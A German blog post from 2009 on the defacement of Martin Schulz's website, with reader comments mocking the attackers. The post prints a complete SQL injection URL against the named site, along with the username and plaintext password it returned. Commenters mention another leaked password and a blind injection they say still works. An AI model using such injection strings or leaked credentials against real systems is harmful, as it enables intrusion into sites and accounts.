martin-schulz.info hacked?!

Die Website vom Martin Schulz “Vorsitzender der Fraktion der Sozialdemokratischen Partei Europas (SPE) im Europäischen Parlament” wurde am 13.07.2009 defaced.

Aufmerksam wurde darauf gemacht mit “Zensursula ICH LIEBE DICH” und dem Zensursula Video http://youtube.com/watch?v=O4vbdusj7Pk

Hier sind screenshots von 9 Eintraegen in “Aktuelles”, eventuell sieht man nun wie l33t einige doch sind 🙂

Nr. 2:

Nr. 3:

Nr. 4:

Nr. 5:

Nr. 6:

Nr. 7:

Nr. 8:

Nr. 9:

Und so lustig wie einige sind, wurde auch noch extra das “Zur Person” geaendert:

Tja.. was soll man dazu noch sagen.

Mich wudert es eher warum die Seite erst jetzt defaced wurde, da die Luecke keine schwer zu findende war.

Die (vollendete) SQL Injection:

http://martin-schulz.info/index.php?link=4&bereich=1&details=1&id=-180+union+select+1,concat_ws(0x3a,benutzername,passwort),3,4,5,6,7,8,9,10,11,12,13+from+user-- f

Ausgegeben wird uns:

visualseven:chang0red

Das heißt jemand war schneller und hat das PW geaendert zu “chang0red”. Mich wunderts nur dass das PW in der MySQL DB plain / unverschluesselt gespeichert wird..

Najo was soll man noch dazu sagen?

Richtig. Hat die Aktion auch nurn bissle was gebracht? Konnte irgendwas erreicht werden in der Politik, außer dass nun andere gegruesst wurden und von einigen Leuten das kindischen Verhalten freien Lauf hatte? Nicht wirklich.

13 Replies to “martin-schulz.info hacked?!”

  1. Wirklich eine sehr arme Aktion, man hätte diese Lücke auch irgendwie sinnvoller für die Ziele der Piratenpartei ausnutzen können – oder gleich einfach eine kleine Meldung an den Admin machen können.

    Aber nunja, es zeigt mal wieder, dass sich zu viele einfach nicht die Konsequenzen ihrer Taten im Internet bewusst machen.

    PS: Ich sehe grade, die Änderungen sind teilweise wirklich sehr niveaulos…

  2. Ich lachte hart!

    “Wirklich eine sehr arme Aktion, man hätte diese Lücke auch irgendwie sinnvoller für die Ziele der Piratenpartei ausnutzen können”

    Diese Idee ist genauso dämlich wie der “Deface” der Seite. Denkt man 1-2 Schritte weiter kommt man an den Punkt an dem man sich fragt wer könne denn für die Piratenpartei Werbung auf der “gehackten” Seite machen als die Piratenpartei selbst.

    Daraus resultiert nur wieder schlechte Presse und öffentliche Meinung.

  3. Naja, sinnlose Aktion..
    Die scheinen aber auch mehrere Passwörter geändert haben..
    Eins davon ist beispielsweise “stasi2”.

  4. @Five-Three-Nine:
    Du verstehst mich falsch: Der “Hacker” scheint ein Sympathisant der PP zu sein – d.h. er will irgendwie Werbung dafür machen.

    Klar ist es unsinnig, mit illegalen Aktionen eine Partei zu bewerben, aber wenn schon, dann doch nicht so! Da hätte ein Banner der PP doch viel mehr Wirkung und Witz gehabt.

  5. Sehr lächerlich das ganze.
    So etwas zeugt von geistiger Unreife.

    Scheinbar wird der Hintergrund der Piraten Partei falsch interpretiert.

    Wenn sich der “Defacer” für die Piraten Partei einsetzen wollte/will, dann hat er damit den sogenannten “Schuss in den Ofen” gesetzt.

    Die Piraten Partei hat ein Primärziel, welches die Partei zur Wahl über die 5%-Grenze heben soll.

    Solche Aktionen bezwecken das komplette Gegenteil.

    Der “Defacer” ist meiner Meinung nach einfach nur ein kleiner Fanboy welcher die Piraten Partei cool findet, aber politisch absolut ungebildet ist.

    Soviel von mir.
    Schönen Abend noch ihr lieben 😉

    Gruß
    tr4st

  6. Da gibts kaum noch was hinzuzufügen. Es wurde alles gesagt.
    Zusammengefasst:
    Sinnlose Kinderkacke.

    //Evtl. ist der h4xXx0r auch negativ der Piratenpartei gegenüber eingestellt und will ihr somit schaden? Ne…Auf sowas kommen die nicht. 😉

  7. kiddies!

    die lücke nichtmal selber gefunden und dann noch so kindisch defacen-.-

  8. Ich hätte die Admindaten nicht posten sollen bei SC -.-
    B2t, die Admins haben den zweiten Query rechts übersehen, da geht immer noch eine Blind..

  9. fred777 niee wieder admindaten posten 😡
    Die injection hätte jedes kleine kind schaffen können^^
    Btw sie haben passwörter und benutzernamen geändert 😉
    aber hat lange gedauert bis der user mit pw stasi2 gelöscht wurde..
    :>

  10. auch hier raff ichs nicht, was bringt mir das mysql admin pw wenn der 3306er nur lokal läuft? john klär mich auf 😀 thx!

Leave a Reply

Your email address will not be published.